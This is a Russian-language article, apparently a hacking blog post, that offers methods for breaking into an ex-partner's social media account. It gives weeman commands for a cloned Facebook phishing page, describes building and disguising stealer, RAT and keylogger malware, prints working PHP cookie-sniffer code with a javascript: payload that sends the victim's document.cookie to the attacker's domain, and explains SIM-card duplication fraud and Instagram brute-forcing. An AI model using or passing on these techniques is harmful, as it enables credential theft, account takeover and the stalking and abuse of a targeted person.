Статья
Амигос, вы просили, мы сделали! В этой статье разберем различные способы, пользуясь которыми вы непременно ломанете страницу свой бывшей!
Способ 1. Фишинг
При его реализации буду юзать операционную систему Kali Linux. Этот способ подходит для любых социальных сетей, поэтому бонусом покажу, как создать фишинг Facebook. По тому же принципу создается фишинг Instagram.
Сначала давайте рассмотрим зависимости:
1. python 2.7
2. pip2
3. python-dev
Сперва наперво надо клонировать его к себе на ПК:
git clone https://github.com/evait-security/weeman.git
Переходим в директорию weeman:
cd weeman
И запускаем weeman.py:
sudo python2 weeman.py
После запуска видим такую картину:
Итак, начнем создание фишинг-сайта.
Сначала выберем сайт, фишинг которого планируем сделать:
set url https://www.facebook.com
Выберем порт:
set port 8080
И напишем, куда после этого будет направлять пользователя:
set action_url https://www.facebook.com
И запуск:
run
Потом, если кто-то зайдет и введет свои данные мы увидим примерно такую картину:
email => тутпочтажертвы@домен.ком
pass => тутпарольотсоциальнойсети
Сложность данного метода заключается только в том, что требуется хороший уровень СИ, чтобы цель перешла по ссылке.
Способ 2. Вредоносное ПО
Для начала немного теории.
Стиллер - вредонос, который ворует пароли и куки из браузеров.
RAT - вирус удаленного доступа, который дает полный контроль над ПК жертвы.
Кейлоггер - малварь, способная сохранять все напечатанные символы (то есть сниффает данные, введеные с клавиатуры).
Подобный метод взлома так же довольно непростой, так как требуются очень хорошие навыки СИ, а так же OSINT (поиска информации из открытых источников), чтобы определить систему потенциальной жертвы (глупо скидывать .exe на устройства на базе Android).
Вот пример того, как можно собрать стиллер sAINT с помощью Kali Linux. Единственная проблема - паблик софты детектятся антивирусами.
Тут имеется возможность делать фотографии с веб-камеры, функция кейлоггера, стиллера. Потом можно софт склеить с картинкой, например.
Способ 3. Сниффер куки.
Итак, нам нужен будет ftp сервер. На нём надо создать папку, называем ее next.
Внутри папки создаём файл index.php
Далее открываем и пишем снифер:
<?php
//получаем данные с ссылки
$cookie = $_SERVER['REQUEST_URI'];
//ip адрес
$ip = $_SERVER['REMOTE_ADDR'];
//Создаём файл
$file = fopen("snif.dat","a+");
//вычисляем текущее время
$time = date("H:i:M:d");
//добавляем в строковую переменную куки + время + ip
$add_text = "$ip $time $cookie";
//записываем данные в файл
fputs($file,$add_text.",\r\n");
//закрываем файл
fclose($file);
//что бы не спалили переносим пользователя обратно в инсту
header('Location:https://www.instagram.com');
?>
Снифер готов. У нас должна получиться такая вот ссылка:
http://ваш_домен.ру/next/index.php
Далее открываем любой текстовый редактор (например блокнот) и пишем:
javascript:window.location.href = "http://ваш_домен.ру/next/index.php?cookie="+document.cookie;
Ваша задача с помощью СИ заставить жертву ввести это в строку своего браузера. Если она это сделает, то поделиться своими куки-файлами, позволяющими нам, с помощью расширения в браузере EditThisCookie подменить их. Потом переходим по ссылке: instagram.com и вуаля! Аккаунт в наших руках.
Сложность: нужно заставить сделать это действие, так же возможно, что в браузере жертвы отключен JavaScript, без которого способ не будет работать.
Способ 4. Взлом через сотового оператора.
На некоторых форумах можно найти объявления о восстановлении сим-карт или их дублировании. Узнаем номер жертвы, далее заказываем дубликат, а потом восстанавливаем доступ к странице с помощью этого номера.
Нюансы: аккаунт может быть привязан к почте, что не позволит получит доступ к аккаунту, имея только номер телефона и доступ к нему.
Способ 5. Брутфорс
На GitHub существует репозиторий, позволяющий брутить Instagram-аккаунты, в обход анти-брут защиты. В суть технологии вдаваться не буду, просто посмотрите видео о том, как происходит атака.